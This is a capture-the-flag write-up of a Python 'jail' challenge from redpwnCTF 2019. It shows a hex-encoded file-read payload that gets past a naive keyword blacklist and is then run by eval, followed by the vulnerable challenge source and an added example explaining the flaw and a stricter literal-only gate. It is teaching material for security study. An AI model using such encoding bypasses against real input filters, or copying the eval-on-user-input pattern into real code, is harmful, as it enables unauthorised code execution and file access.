Tags: misc python jail 


This misc challenge comes with the description:
When has a blacklist of insecure keywords EVER failed?

nc chall2.2019.redpwn.net 6006
We are also given a blacklist of words (see blacklist.txt) that we can't use in this Python shell. Let's try to open a file the classic way:

wow! there's a file called flag.txt right here!
>>> print(open('flag.txt').read())
That's not allowed here

The blacklist is actually working. Let's try entering random input to raise an error:

wow! there's a file called flag.txt right here!
>>> asd
Traceback (most recent call last):
  File "jail1.py", line 49, in <module>
    data = eval(data)
  File "<string>", line 1, in <module>
NameError: name 'asd' is not defined

Here we can see that the input is passed to eval. Let's assume that the blacklist check is as naive as:

for x in blacklist:
    if x in readed:
        pass  # error handling

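We can bypass the check by passing the file-reading statement in encoded form, so that the banned words never appear in the input. Let's try hexadecimal: the statement from the first attempt, hex-encoded, is sent as a string literal that the shell decodes:
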
wow! there's a file called flag.txt right here!
>>> "7072696e74286f70656e2827666c61672e74787427292e72656164282929".decode('hex')

P.S: Let's have fun dumping the software used for this challenge using:


The code used for this challenge is:

#!/usr/bin/env python

from __future__ import print_function

print("wow! there's a file called flag.txt right here!")
banned = [
    "i love blacklisting words!",
    "windows users",
    "most of these are in here just to confuse you",
    "hah almost forgot that one",
    "yah have fun",
]

while 1:
    print(">>>", end=' ')
    data = raw_input()
    # The check is a case-insensitive substring match on the raw input only.
    for no in banned:
        if str(no).lower() in str(data).lower():
            print("That's not allowed here")
            break
    else: # this means nobreak
        # Input that passed the substring check is evaluated as Python.
        data = eval(data)
        if("code" not in str(data)):
            data = str(data)
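
Why the substring check passes the hex-encoded input, and what a stricter gate looks like, as an added example (not part of the original writeup or the challenge source). It is written for Python 3, so bytes.fromhex stands in for Python 2's .decode('hex'); BANNED is a constructed stand-in for blacklist.txt, and naive_filter, hidden_words and strict_eval are hypothetical helper names.

```python
import ast

# Constructed stand-in for blacklist.txt; the real list is not reproduced here.
BANNED = ["open", "read", "flag", "import", "exec"]

# The two inputs shown in the writeup.
DIRECT = "print(open('flag.txt').read())"
ENCODED = '"7072696e74286f70656e2827666c61672e74787427292e72656164282929".decode(\'hex\')'


def naive_filter(data, banned=BANNED):
    """Substring check in the style of the challenge: True means 'allowed'."""
    lowered = data.lower()
    return not any(word.lower() in lowered for word in banned)


def hidden_words(data, banned=BANNED):
    """Banned words that only become visible once hex string literals are decoded."""
    found = set()
    for node in ast.walk(ast.parse(data, mode="eval")):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            try:
                decoded = bytes.fromhex(node.value).decode("latin-1").lower()
            except ValueError:
                continue  # this literal is not a hex string
            found.update(word for word in banned if word in decoded)
    return sorted(found)


def strict_eval(data):
    """Hardened replacement for eval(): literals only, no calls or attribute access."""
    try:
        return True, ast.literal_eval(data)
    except (ValueError, SyntaxError) as exc:
        return False, type(exc).__name__


if __name__ == "__main__":
    for label, text in (("direct", DIRECT), ("encoded", ENCODED)):
        print(label, "| filter allows:", naive_filter(text),
              "| hidden:", hidden_words(text),
              "| strict_eval:", strict_eval(text))
```

The filter inspects the text of the input, while eval acts on what that text computes. Decoding literals as hidden_words does only catches this one encoding, so the durable fix is to restrict what can be evaluated, as strict_eval does.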

Original writeup (https://github.com/pwnsticciotti/writeups/blob/master/redpwnCTF/genericpyjail/README.md).